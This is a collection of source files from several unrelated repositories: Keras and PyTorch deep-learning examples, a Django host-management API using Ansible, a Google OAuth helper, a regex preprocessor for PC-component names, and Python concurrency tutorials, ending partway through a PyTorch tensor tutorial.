dropout=0.2,
recurrent_dropout=0.2,
input_shape=(None, float_data.shape[-1]))) # dropout recurrent_dropout
model.add(layers.Dense(1))
model.compile(optimizer=RMSprop(), loss='mae')
history = model.fit_generator(train_gen,
steps_per_epoch=500,
epochs=40,
validation_data=val_gen,
validation_steps=val_steps)
# plot
import matplotlib.pyplot as plt
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(loss))
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
```
#### File: 83286415/DeepLearningWithPythonKeras/7.2.1-model-callbacks-in-training-process.py
```python
import keras
print(keras.__version__) # 2.2.4
from keras import layers
from keras import models
from keras.datasets import mnist
from keras.utils import to_categorical
# 5.1 py
# Import codes from 5.1 py for data preparation and model building
# build the network model
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten()) # 3D->1D
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax')) # multi-classification
# prepare mnist data
(train_images, train_labels), (test_images, test_labels) = mnist.load_data() # total 70000 images in MNIST
train_images = train_images.reshape((60000, 28, 28, 1))
train_images = train_images.astype('float32') / 255 # astype: keep the int part
test_images = test_images.reshape((10000, 28, 28, 1)) # add the single channel dimension
test_images = test_images.astype('float32') / 255 # make values in [0, 255] to values in [0, 1]
train_labels = to_categorical(train_labels) # one_hot labels
test_labels = to_categorical(test_labels)
# commented out below codes for adding callbacks in fit process
# model.compile(optimizer='rmsprop',
# loss='categorical_crossentropy',
# metrics=['acc'])
# model.fit(train_images, train_labels, epochs=5, batch_size=64)
#
# test_loss, test_acc = model.evaluate(test_images, test_labels)
# print(test_loss, test_acc) # 0.0261321800082751 0.9926 better than 0.978 which in chapter 2 using dense layers
print('data preparation and model building done')
print('---------------------------------------------------------------------------------------------------------------')
# 7.2.1.3 define my own callbacks
import keras
class ActivationLogger(keras.callbacks.Callback):
def set_model(self, model):
self.model = model
layer_outputs = [layer.output for layer in model.layers] # can read model's property
self.activations_model = keras.models.Model(model.input, layer_outputs) # can make Model instance
def on_epoch_end(self, epoch, logs=None): # other 5 defs could be recognized by fit(): refer to book P212
if self.validation_data is None: # can read validation_data in fit()
raise RuntimeError('Requires validation_data.')
f = open('activations_at_epoch_' + str(epoch) + '.txt', 'w')
f.write('the first epoch activation saved by my own callbacks')
f.close()
print('define my own callbacks done')
print('---------------------------------------------------------------------------------------------------------------')
# 7.2.1.1 keras callbacks in training process
import os
base_dir = 'D:/AI/deep-learning-with-python-notebooks-master'
h5_path = os.path.join(base_dir, '7.2.1_model_checkpoint.h5')
# callback (list) should be defined in front of the fit()
callbacks_list = [keras.callbacks.EarlyStopping(monitor='val_acc', patience=1,),
keras.callbacks.ModelCheckpoint(filepath=h5_path, monitor='val_loss', save_best_only=True),
keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3), # keras callbacks
ActivationLogger()] # my own callback
# import compile() and fit() from 5.1 py and add callbacks into the fit() as below
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['acc'])
history = model.fit(train_images, train_labels, epochs=20, batch_size=64, callbacks=callbacks_list, validation_split=0.2)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print(test_loss, test_acc) # 0.03851035969056033 0.9921
# plot
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
print('keras callbacks in training process done')
print('---------------------------------------------------------------------------------------------------------------')
``` |
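For comparison with the `ActivationLogger` subclass above, `keras.callbacks.LambdaCallback` covers simple epoch-boundary hooks without subclassing. The sketch below trains a throwaway model on random data purely to show the callback firing; nothing here comes from the chapter's code.
```python
import numpy as np
import keras
from keras import layers, models

x = np.random.random((200, 16))
y = np.random.randint(0, 2, size=(200, 1))

model = models.Sequential()
model.add(layers.Dense(8, activation='relu', input_shape=(16,)))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer='rmsprop', loss='binary_crossentropy')

log_cb = keras.callbacks.LambdaCallback(
    on_epoch_end=lambda epoch, logs: print('epoch {} loss {:.4f}'.format(epoch, logs['loss'])))
model.fit(x, y, epochs=3, batch_size=32, callbacks=[log_cb], verbose=0)
```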
{
"source": "834799106/TSAN-brain-age-estimation",
"score": 2
} |
#### File: TSAN-brain-age-estimation/TSAN/prediction_first_stage.py
```python
import numpy as np
import torch.nn as nn
import os,shutil,torch
import matplotlib.pyplot as plt
from utils.config import opt
from load_data import IMG_Folder
from model import ScaleDense
from scipy.stats import pearsonr,spearmanr
from sklearn.metrics import mean_absolute_error
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def metric(output, target):
target = target.data.numpy()
pred = output.cpu()
pred = pred.data.numpy()
mae = mean_absolute_error(target,pred)
return mae
def main():
# ======== define data loader and CUDA device ======== #
test_data = IMG_Folder(opt.excel_path, opt.test_folder)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# ======== build and set model ======== #
if opt.model == 'ScaleDense':
model = ScaleDense.ScaleDense(8, 5, opt.use_gender)
else:
print('Wrong model choose')
# ======== load trained parameters ======== #
model = nn.DataParallel(model).to(device)
criterion = nn.MSELoss().to(device)
model.load_state_dict(torch.load(os.path.join(opt.output_dir+opt.model_name))['state_dict'])
# ======== build data loader ======== #
test_loader = torch.utils.data.DataLoader(test_data
,batch_size=opt.batch_size
,num_workers=opt.num_workers
,pin_memory=True
,drop_last=True
)
# ======== test preformance ======== #
test( valid_loader=test_loader
, model=model
, criterion=criterion
, device=device
, save_npy=True
, npy_name=opt.npz_name
, figure=False
, figure_name=opt.plot_name)
def test(valid_loader, model, criterion, device
, save_npy=False,npy_name='test_result.npz'
, figure=False, figure_name='True_age_and_predicted_age.png'):
'''
    [Run the test process with a pretrained model]
Args:
valid_loader (torch.dataloader): [test set dataloader defined in 'main']
model (torch CNN model): [pre-trained CNN model, which is used for brain age estimation]
criterion (torch loss): [loss function defined in 'main']
device (torch device): [GPU]
save_npy (bool, optional): [If choose to save predicted brain age in npy format]. Defaults to False.
npy_name (str, optional): [If choose to save predicted brain age, what is the npy filename]. Defaults to 'test_result.npz'.
figure (bool, optional): [If choose to plot and save scatter plot of predicted brain age]. Defaults to False.
figure_name (str, optional): [If choose to save predicted brain age scatter plot, what is the png filename]. Defaults to 'True_age_and_predicted_age.png'.
Returns:
        [float]: MAE and Pearson correlation coefficient of predicted brain age on the test set.
'''
losses = AverageMeter()
MAE = AverageMeter()
model.eval() # switch to evaluate mode
out, targ, ID = [], [], []
target_numpy, predicted_numpy, ID_numpy = [], [], []
print('======= start prediction =============')
# ======= start test programmer ============= #
with torch.no_grad():
for _, (input, ids ,target,male) in enumerate(valid_loader):
input = input.to(device).type(torch.FloatTensor)
# ======= convert male lable to one hot type ======= #
male = torch.unsqueeze(male,1)
male = torch.zeros(male.shape[0],2).scatter_(1,male,1)
male = male.type(torch.FloatTensor).to(device)
target = torch.from_numpy(np.expand_dims(target,axis=1))
target = target.type(torch.FloatTensor).to(device)
# ======= compute output and loss ======= #
if opt.model == 'ScaleDense' :
output = model(input,male)
else:
output = model(input)
out.append(output.cpu().numpy())
targ.append(target.cpu().numpy())
ID.append(ids)
loss = criterion(output, target)
mae = metric(output.detach(), target.detach().cpu())
# ======= measure accuracy and record loss ======= #
losses.update(loss, input.size(0))
MAE.update(mae, input.size(0))
targ = np.asarray(targ)
out = np.asarray(out)
ID = np.asarray(ID)
for idx in targ:
for i in idx:
target_numpy.append(i)
for idx in out:
for i in idx:
predicted_numpy.append(i)
for idx in ID:
for i in idx:
ID_numpy.append(i)
target_numpy = np.asarray(target_numpy)
predicted_numpy = np.asarray(predicted_numpy)
ID_numpy = np.asarray(ID_numpy)
errors = predicted_numpy - target_numpy
abs_errors = np.abs(errors)
errors = np.squeeze(errors,axis=1)
abs_errors = np.squeeze(abs_errors,axis=1)
target_numpy = np.squeeze(target_numpy,axis=1)
predicted_numpy = np.squeeze(predicted_numpy,axis=1)
# ======= output several results ======= #
print('===============================================================\n')
print(
'TEST : [steps {0}], Loss {loss.avg:.4f}, MAE: {MAE.avg:.4f} \n'.format(
len(valid_loader), loss=losses, MAE=MAE))
print('STD_err = ', np.std(errors))
print(' CC: ',np.corrcoef(target_numpy,predicted_numpy))
print('PAD spear man cc',spearmanr(errors,target_numpy,axis=1))
print('spear man cc',spearmanr(predicted_numpy,target_numpy,axis=1))
print('mean pad:',np.mean(errors))
print('\n =================================================================')
if save_npy:
savepath = os.path.join(opt.output_dir,npy_name)
np.savez(savepath
,target=target_numpy
,prediction=predicted_numpy
,ID=ID_numpy)
# ======= Draw scatter plot of predicted age against true age ======= #
if figure is True:
plt.figure()
lx = np.arange(np.min(target_numpy),np.max(target_numpy))
plt.plot(lx,lx,color='red',linestyle='--')
plt.scatter(target_numpy,predicted_numpy)
plt.xlabel('Chronological Age')
plt.ylabel('predicted brain age')
# plt.show()
plt.savefig(opt.output_dir+figure_name)
return MAE ,np.corrcoef(target_numpy,predicted_numpy)
if __name__ == "__main__":
main()
```
#### File: TSAN/utils/discriminate_age.py
```python
import torch
import numpy as np
def discriminate_age(age, range=5):
'''
[summary]
Args:
age (numpy array): [predicted brain age from first stage network, which is needed to discriminate.]
range (int, optional): [discritized delta]. Defaults to 5.
Returns:
[numpy array]: [discritized predicted brain age]
'''
dis = []
for i in age:
value = i // range
x = i % range
if x < range/2:
discri_age = value * range
else:
discri_age = (value+1)*range
dis.append(discri_age)
dis_age = np.asarray(dis,dtype='float32')
dis_age = np.expand_dims(dis_age,axis=1)
dis_age = torch.from_numpy(dis_age)
return dis_age
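# Minimal usage sketch (hypothetical inputs, not part of the original repo):
# each predicted age is snapped to the nearest multiple of `range`, with exact
# halves rounded up, and the result comes back as an (N, 1) float tensor.
if __name__ == "__main__":
    example_ages = np.array([23.4, 61.8, 47.5], dtype='float32')
    print(discriminate_age(example_ages, range=5))  # multiples of 5: 25., 60., 50.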
``` |
{
"source": "837278709/django-host-manage",
"score": 2
} |
#### File: django-host-manage/host_management/views.py
```python
from __future__ import unicode_literals
from collections import OrderedDict
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework import viewsets
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from .models import Host, BusinessLine
from .serializers import HostSerializer
from . import ansible_cli
def run_shell(request):
hosts = ['localhost,127.0.0.1']
cmd = "cat /etc/hostname"
ansible_cli.shell_cli(hosts, shell_cmd=cmd,
module="shell", remote_user="root")
return
def get_host_info(request):
hosts = ['localhost,192.168.31.247']
cmd = "gather_subset=min"
ansible_cli.shell_cli(hosts, shell_cmd=cmd,
module="setup", remote_user="root")
return
class StandardResultsSetPagination(PageNumberPagination):
page_size = 100
page_size_query_param = 'page_size'
max_page_size = 1000
def get_paginated_response(self, data):
return Response(OrderedDict([
('business_line', BusinessLine.objects.values('id','name',)),
('page', None),
('count_page', None),
('count', self.page.paginator.count),
('next', self.get_next_link()),
('previous', self.get_previous_link()),
('table_header', None),
('results', data)
]))
class HostViewSet(viewsets.ModelViewSet):
queryset = Host.objects.all()
serializer_class = HostSerializer
pagination_class = StandardResultsSetPagination
filter_backends = (filters.OrderingFilter, filters.SearchFilter,
DjangoFilterBackend)
ordering_fields = ('create_time', 'update_time')
ordering = ('-update_time',)
search_fields = ('hostname', )
filter_fields = ('business_line', 'address', 'os_type', 'name', 'domain')
def list(self, request, *args, **kwargs):
table_header = [{
"title": "IP",
"index": "name"
}, {
"title": "主机名",
"index": "hostname"
}, {
"title": "内存",
"index": "memory"
}, {
"title": "磁盘",
"index": "disk"
}, {
"title": "网络域",
"index": "domain"
}, {
"title": "CPU 数",
"index": "cpu"
}, {
"title": "地址",
"index": "address_name"
}, {
"title": "业务线",
"index": "business_line"
}, {
"title": "创建时间",
"index": "create_time"
}, {
"title": "更新时间",
"index": "update_time"
}, {
"title": "备注信息",
"index": "note"
}]
rv = super(HostViewSet, self).list(request, *args, **kwargs)
if not rv.data.get("table_header"):
rv.data["table_header"] = table_header
page_size = request.query_params.get('page_size')
count = rv.data.get("count")
if not page_size:
page_size = StandardResultsSetPagination.page_size
else:
page_size = int(page_size)
if not rv.data.get("count_page"):
rv.data["count_page"] = count // page_size + 1
rv.data["page"] = request.query_params.get('page')
return rv
``` |
{
"source": "837477/COMTRIS_AI",
"score": 3
} |
#### File: src/db_preprocessor/regex_processor.py
```python
import os
import re
from tqdm import tqdm
from pymongo import MongoClient
class RegexPreprocessor():
    '''Regex-based data preprocessor'''
def __init__(self):
self.cpu_regex = ""
self.vga_regex = ""
self.mb_regex = ""
self.ram_regex = ""
self.ssd_regex = ""
self.power_regex = ""
        self.ram_clock = {
            # memory bandwidth rating (PC label) -> effective clock speed
            "25600": "3200",
            "24000": "3000",
            "23400": "2933",
            "21300": "2666",
            "19200": "2400",
            "38400": "4800",
            "36800": "4600",
            "36000": "4500",
            "35200": "4400",
            "34400": "4300",
            "34100": "4266",
            "33000": "4133",
            "32000": "4000",
            "30900": "3866",
            "30400": "3800",
            "28800": "3600",
            "27700": "3466",
            "27200": "3400",
            "26600": "3333",
            "22400": "2800",
            "17000": "2133",
            "14900": "1866",
            "12800": "1600",
            "10600": "1333",
            "10000": "1250",
            "8500": "1066"
        }
def cpu(self, text):
brand = "AMD"
for check in ["INTEL", "intel", "인텔"]:
if check in text:
brand = "INTEL"
if brand == "INTEL":
regex_result = re.findall("\d{4,5}KF|\d{4,5}K|\d{4,5}F|\d{4,5}X|\d{4,5}", text)
else:
regex_result = re.findall("\d{4,5}X|\d{4,5}G|\d{4,5}", text)
if not regex_result:
return None
return brand + " " + regex_result[0]
def vga(self, text):
brand = re.findall("GAINWARD|이엠텍|MSI|ZOTAC|갤럭시|ASUS|GIGABYTE|PowerColor|리드텍|AFOX|AKiTiO|AMD|ARKTEK|ASRock|ATUM|AXLE|COLORFUL|EVGA|FORSA|HIS|INNO3D|MANLI|MAXSUN|NETSTOR|NVIDIA|PALIT|PNY|Razer|SAPPHIRE|SNK테크|SOYO|Sonnet|TAGER|XFX|레노버|매트록스|세컨드찬스|엠탑코리아", text)
chipset = re.findall("GTX\d{3,4}SUPER|GTX \d{3,4}SUPER|GTX\d{3,4} SUPER|GTX \d{3,4} SUPER|GTX\d{3,4}Ti|GTX \d{3,4}Ti|GTX\d{3,4} Ti|GTX \d{3,4} Ti|GTX\d{3,4}TI|GTX \d{3,4}TI|GTX\d{3,4} TI|GTX \d{3,4} TI|GTX\d{3,4}|GTX \d{3,4}|RTX\d{3,4}super|RTX \d{3,4}super|RTX\d{3,4} super|RTX \d{3,4} super|RTX\d{3,4}SUPER|RTX \d{3,4}SUPER|RTX\d{3,4} SUPER|RTX \d{3,4} SUPER|RTX\d{3,4}Ti|RTX \d{3,4}Ti|RTX\d{3,4} Ti|RTX \d{3,4} Ti|RTX\d{3,4}|RTX \d{3,4}|RX\d{3,4}XT|RX \d{3,4}XT|RX\d{3,4} XT|RX \d{3,4} XT|RX\d{3,4}|RX \d{3,4}", text)
if (not brand) or (not chipset):
return None
return chipset[0].upper().replace(" ", "") + " " + brand[0].upper()
def mb(self, text):
brand = re.findall("ASRock|ASUS|MSI|GIGABYTE|ECS|AFOX|ASRock Rack|Arduino|BIOSTAR|COLORFUL|FOXCONN|JETWAY|Maxtang|Raspberry Pi|Supermicro|TYAN|디지탈그린텍|마이크로닉스|이엠텍|인텍앤컴퍼니|인텔|코코아팹", text)
chipset = re.findall("\w\d{2,3}\w", text)
if (not brand) or (not chipset):
return None
return chipset[0].upper() + " " + brand[0].upper()
def ram(self, text):
# brand = re.findall("삼성전자|ADATA|G.SKILL|GeIL|ACPI|AFOX|AVEXIR|Antec|Apacer|CORSAIR|CYNEX|Dreamware|EKMEMORY|ESSENCORE|GIGABYTE|GLOWAY|GSMS|HP|INNO3D|KINGMAX|LANSON|OCPC|OLOy|PATRIOT|PNY|SK하이닉스|TeamGroup|Terabyte|V-Color|ZADAK|갤럭시|건평정보통신|디자인|마이크론|실리콘파워|써멀테이크|어드반|오존컴퍼니|이메이션|킹스톤|타무즈|트랜센드", text)
chipset = re.findall("\d{5}|\d{4}", text)
volume = re.findall("\d{1,2}GB|\d{1,2}gb|\d{1,2}G|\d{1,2}g", text)
if (not chipset) or (not volume):
return None
        # Reprocess the chipset: 5-digit bandwidth ratings are mapped to clock speeds
        if len(chipset[0]) == 5:
            chipset[0] = self.ram_clock[chipset[0]]
        # Reprocess the capacity: keep the largest stick and normalise the unit to GB
if len(volume) >= 2:
for idx, value in enumerate(volume):
volume[idx] = volume[idx].replace("GB", "")
volume[idx] = volume[idx].replace("G", "")
volume[idx] = volume[idx].replace("gb", "")
volume[idx] = volume[idx].replace("g", "")
volume[idx] = int(volume[idx])
volume[0] = str(max(volume)) + "GB"
if volume[0][-1] == "G":
volume[0] += "B"
return chipset[0] + " " + volume[0]
def ssd(self, text):
# brand = re.findall("삼성전자|마이크론|ADATA|Western Digital|ACPI|AFOX|ASUS|AVEXIR|Apacer|Axxen|BIOSTAR|BIWIN|BLUE-I|COLORFUL|COOLERTEC|CORSAIR|CRAFT|DATARAM|DIGIFAST|DIGISTOR|EAGET|EKMEMORY|ESSENCORE|EVERCOOL|EXASCEND|FOXCONN|Faspeed|GIGABYTE|GLOWAY|GeIL|GrinMax|HGST|HIKVISION|HP|ICY DOCK|IPT|JEYI|KINGMAX|Kim MiDi|Kimtigo|KingDian|KingSpec|Korlet|Lexar|Lite-On|Longsys|MAIWO|MARSHAL|MK2|MUSHKIN|MiSD|MyDigitalSSD|MySSD|NCTOP|NOFAN|Netac|OCPC|OCZ SS|ORICO|OWC|PALIT|PATRIOT|PHINOCOM|PNY|Plextor|RAMIS|RiTEK|SK하이닉스|SONY|STARSWAY|STCOM|SUNEAST|Sandisk|Seagate|SilverStone|Supertalent|Synology|TCSUNBOW|TOPDISK|TeamGroup|Toshiba|UNITEK|Union Memory|VIA|Vaseky|VisionTek|ZOTAC|innoDisk", text)
volume = re.findall("\d{3}GB|\dTB|\d{3}gb|\dtb|\d{3}G|\dT|\d{3}g|\dt", text)
if (not volume):
return None
return volume[0].upper()
def power(self, text):
regex_result = re.findall("\d{3,4}W|\d{3,4}w|\d{3,4}", text)
if not regex_result:
return None
regex_result[0] = regex_result[0].upper()
if regex_result[0][-1] != "W":
regex_result[0] = regex_result[0] + "W"
return regex_result[0]
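# Illustrative parses on made-up product strings (hypothetical examples, not from the crawled data):
#   rp = RegexPreprocessor()
#   rp.cpu("인텔 코어i5-12400F")       -> "INTEL 12400F"
#   rp.ram("삼성전자 DDR4-25600 16GB")  -> "3200 16GB"
#   rp.power("마이크로닉스 700W")        -> "700W"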
if __name__ == "__main__":
db = MongoClient(os.environ['COMTRIS_MONGODB_URI'])['COMTRIS']
rp = RegexPreprocessor()
for col in ['gallery', 'review', 'pc_quote']:
print(col, "Re Preprocessing...")
targets = list(db[col].find({}, {'shop_date': 0, 'crawl_date': 0, 'id': 0, 'pass': 0}))
for idx in tqdm(range(len(targets))):
for key, value in targets[idx]['original'].items():
if key == "CPU":
regex_result = rp.cpu(value)
targets[idx]['CPU'] = regex_result
elif key == "M/B" or key == "M/b":
regex_result = rp.mb(value)
targets[idx]['M/B'] = regex_result
elif key == "RAM":
regex_result = rp.ram(value)
targets[idx]['RAM'] = regex_result
elif key == "VGA":
regex_result = rp.vga(value)
targets[idx]['VGA'] = regex_result
elif key == "SSD":
regex_result = rp.ssd(value)
targets[idx]['SSD'] = regex_result
elif key == "POWER":
regex_result = rp.power(value)
targets[idx]['POWER'] = regex_result
db[col].update_one({'_id': targets[idx]['_id']}, {'$set': targets[idx]})
``` |
{
"source": "837477/FastAPI-Pymongo",
"score": 2
} |
#### File: app/routers/templates.py
```python
from fastapi import APIRouter, Request
from fastapi.templating import Jinja2Templates
router = APIRouter()
templates = Jinja2Templates(directory="app/assets")
@router.get("/")
async def index(request: Request):
"""
Return Main Page
"""
return templates.TemplateResponse("index.html", {"request": request})
``` |
{
"source": "837477/Oauth",
"score": 3
} |
#### File: Oauth/controller/google.py
```python
import requests
class GoogleOauth:
def __init__(self, config):
self.athorization_server = "https://accounts.google.com/o/oauth2/v2/auth"
self.api_server = "https://oauth2.googleapis.com"
self.client_id = config.GOOGLE_CLIENT_ID
self.secret_key = config.GOOGLE_SECRET_KEY
self.redirect_uri = config.GOOGLE_REDIRECT_URI
def auth(self, code):
"""
사용자로부터 전달 받은 Authorization code를 통하여,
Access / Refresh Token 발행 요청
"""
return requests.post(
url=self.api_server + "/token",
headers={
"Content-Type": "application/x-www-form-urlencoded",
"Cache-Control": "no-cache",
},
data={
"grant_type": "authorization_code",
"client_id": self.client_id,
"client_secret": self.secret_key,
"redirect_uri": self.redirect_uri,
"code": code,
}
).json()
def refresh(self, refresh_token):
"""
Refresh Token을 통하여, 새로운 Access Token 발행 요청
"""
return requests.post(
url=self.api_server + "/token",
headers={
"Content-Type": "application/x-www-form-urlencoded",
"Cache-Control": "no-cache",
},
data={
"grant_type": "refresh_token",
"client_id": self.client_id,
"client_secret": self.secret_key,
"refresh_token": refresh_token
}
).json()
def url(self):
"""
사용자 측에서 접속 할 URL 생성
"""
url = self.athorization_server \
+ "?scope={}" \
+ "&include_granted_scopes={}" \
+ "&response_type={}" \
+ "&state={}" \
+ "&access_type=offline" \
+ "&prompt=consent" \
+ "&redirect_uri={}" \
+ "&client_id={}"
return url.format(
"https://www.googleapis.com/auth/userinfo.email",
"true",
"code",
"state_parameter_passthrough_value",
self.redirect_uri,
self.client_id
)
@staticmethod
def userinfo(access_token):
"""
Access Token을 통하여, 사용자 Information 요청
"""
return requests.get(
url="https://www.googleapis.com/oauth2/v1/userinfo?alt=json&access_token={}".format(
access_token
)
).json()
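# Hedged usage sketch (illustrative only; assumes a `config` object exposing the
# GOOGLE_CLIENT_ID / GOOGLE_SECRET_KEY / GOOGLE_REDIRECT_URI attributes read in __init__):
#   oauth = GoogleOauth(config)
#   login_url = oauth.url()                                  # 1. send the user here
#   tokens = oauth.auth(code)                                # 2. exchange the returned code
#   profile = GoogleOauth.userinfo(tokens["access_token"])   # 3. fetch the profile
#   tokens = oauth.refresh(tokens["refresh_token"])          # 4. renew the access token later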
```
#### File: model/mongodb/user.py
```python
from model.mongodb import Model
class User(Model):
def upsert_user(self, document):
self.col.update_one(
{'id': document['id']},
{'$set': self.schemize(document)},
upsert=True
)
``` |
{
"source": "837477/Python_Parallel",
"score": 3
} |
#### File: Python_Parallel/03_thread_life/classThread.py
```python
from threading import Thread
class myWorkerThread(Thread):
def __init__(self):
print("Hello world")
Thread.__init__(self)
def run(self):
print("Thread is now running")
myThread = myWorkerThread()
print("Created my Thread Object")
myThread.start()
print("Started my thread")
myThread.join()
print("My Thread finished")
```
#### File: Python_Parallel/03_thread_life/forkVsCreate.py
```python
import threading
from multiprocessing import Process
import time
import os
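# Compares the startup cost of 10 threads versus 10 processes running the same
# sleeping task; process creation is the slower of the two because each child
# carries its own interpreter state.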
def MyThread():
time.sleep(2)
t0 = time.time()
threads = []
for i in range(10):
thread = threading.Thread(target=MyThread)
thread.start()
threads.append(thread)
t1 = time.time()
print("Total Time for Creating 10 Threads: {} seconds".format(t1-t0))
for thread in threads:
thread.join()
t2 = time.time()
procs = []
for i in range(10):
process = Process(target=MyThread)
process.start()
procs.append(process)
t3 = time.time()
print("Total Time for Creating 10 Processes: {} seconds".format(t3-t2))
for proc in procs:
proc.join()
```
#### File: Python_Parallel/03_thread_life/slowDown.py
```python
import time
import random
import threading
def calculatePrimeFactors(n):
primfac = []
d = 2
while d*d <= n:
while (n % d) == 0:
primfac.append(d)
n //= d
d += 1
if n > 1:
primfac.append(n)
return primfac
def executeProc():
for i in range(1000):
rand = random.randint(20000, 100000000)
print(calculatePrimeFactors(rand))
def main():
print("Starting number crunching")
t0 = time.time()
threads = []
for i in range(10):
thread = threading.Thread(target=executeProc)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
t1 = time.time()
totalTime = t1 - t0
print("Execution Time: {}".format(totalTime))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/06_debugging_and_benchmarking/timeitTest.py
```python
import threading
import random
import time
def myWorker():
for i in range(5):
print("Starting wait time")
time.sleep(random.randint(1,5))
print("Completed Wait")
thread1 = threading.Thread(target=myWorker)
thread2 = threading.Thread(target=myWorker)
thread3 = threading.Thread(target=myWorker)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
```
#### File: Python_Parallel/08_multi_processing/exceptionHandling.py
```python
import multiprocessing
import os, sys
import traceback
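# Exceptions raised in a child process do not propagate to the parent, so this
# example captures the child's sys.exc_info() and ships it back through an
# os.pipe() for the parent to read after join().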
class MyProcess(multiprocessing.Process):
def __init__(self, pipein):
super(MyProcess, self).__init__()
self.pipein = pipein
def run(self):
try:
raise Exception("This broke stuff")
except:
except_type, except_class, tb = sys.exc_info()
self.pipein = os.fdopen(self.pipein, 'w')
self.pipein.write(str(tb))
self.pipein.close()
def main():
pipeout, pipein = os.pipe()
childProcess = MyProcess(pipein)
childProcess.start()
childProcess.join()
os.close(pipein)
pipeout = os.fdopen(pipeout)
pipeContent = pipeout.read()
print("Exception: {}".format(pipeContent))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/mapPool.py
```python
from multiprocessing import Pool
import time
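# Demonstrates Pool.imap_unordered: results are yielded as soon as each worker
# finishes, so with the sleeps below they print in completion order rather than
# submission order.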
def myTask(n):
time.sleep(n+2)
return n+2
def main():
with Pool(4) as p:
for iter in p.imap_unordered(myTask, [1,3,2,1]):
print(iter)
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/maxTasks.py
```python
from multiprocessing import Pool
import time
import os
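# maxtasksperchild=2 makes the single worker process retire after completing two
# tasks, so the PID printed by myTask changes as replacement workers are spawned.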
def myTask(x, y):
print("{} Executed my task".format(os.getpid()))
return y*2
def main():
with Pool(processes=1, maxtasksperchild=2) as p:
print(p.starmap_async(myTask, [(4,3),(2,1), (3,2), (5,1)]).get())
print(p.starmap_async(myTask, [(4,3),(2,1), (3,2), (2,3)]).get())
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/mpExample.py
```python
from multiprocessing import Pool
import timeit
import math
PRIMES = [
112272535095293,
112582705942171,
112272535095293,
115280095190773,
115797848077099,
112272535095293,
115280095190773,
115797848077099,
112272535095293,
115280095190773,
115797848077099,
112272535095293,
115280095190773,
115797848077099,
1099726899285419]
def is_prime(n):
if n % 2 == 0:
return False
sqrt_n = int(math.floor(math.sqrt(n)))
for i in range(3, sqrt_n + 1, 2):
if n % i == 0:
return False
return True
def main():
t1 = timeit.default_timer()
with Pool(4) as p:
print(p.map(is_prime, PRIMES))
print("{} Seconds needed for multiprocessing pool".format(timeit.default_timer() - t1))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/pipes.py
```python
import os, sys
import multiprocessing
class ChildProcess(multiprocessing.Process):
def __init__(self, pipein):
super(ChildProcess, self).__init__()
self.pipein = pipein
def run(self):
print("Attempting to pipein to pipe")
self.pipein = os.fdopen(self.pipein, 'w')
self.pipein.write("My Name is Elliot")
self.pipein.close()
def main():
pipeout, pipein = os.pipe()
child = ChildProcess(pipein)
child.start()
child.join()
os.close(pipein)
pipeout = os.fdopen(pipeout)
pipeContent = pipeout.read()
print("Pipe: {}".format(pipeContent))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/09_event_based_programming/asyncioQueue.py
```python
import asyncio
import random
import time
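# Producer/consumer on an asyncio.Queue: the producer enqueues a random article
# id every second while the consumer awaits queue.get() indefinitely.  The
# @asyncio.coroutine / `yield from` style is the pre-Python-3.5 spelling of
# async/await.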
@asyncio.coroutine
def newsProducer(myQueue):
while True:
yield from myQueue.put(random.randint(1,5))
yield from asyncio.sleep(1)
@asyncio.coroutine
def newsConsumer(myQueue):
while True:
articleId = yield from myQueue.get()
print("News Reader Consumed News Article {}", articleId)
myQueue = asyncio.Queue()
loop = asyncio.get_event_loop()
loop.create_task(newsProducer(myQueue))
loop.create_task(newsConsumer(myQueue))
try:
loop.run_forever()
finally:
loop.close()
``` |
{
"source": "837477/PyTorch_study",
"score": 3
} |
#### File: practice/pytorch_tutorials/tensor_useful_func.py
```python
import torch
class TensorFuncions():
def __init__(self):
"""
Pytorch는 사용성있는 다양한 함수를 제공한다.
"""
self.x = torch.FloatTensor([[[1, 2]],
[[3, 4]]])
def tensor_expand(self):
"""
expand() 함수는 인자로 들어온 크기로 넓혀준다.
즉, 텐서 x는 (2, 1, 2)의 크기의 텐서이다.
이를 expand(*[2, 3, 2])를 실행하게 된다면,
내부 값을 그대로 복사하여 (2, 3, 2)형태로 만들어준다.
cat()으로 똑같이 구현할 수 있다.
"""
result = self.x.expand(*[2, 3, 2])
print(result)
print(result.size())
cat_result = torch.cat([self.x, self.x, self.x], dim=1)
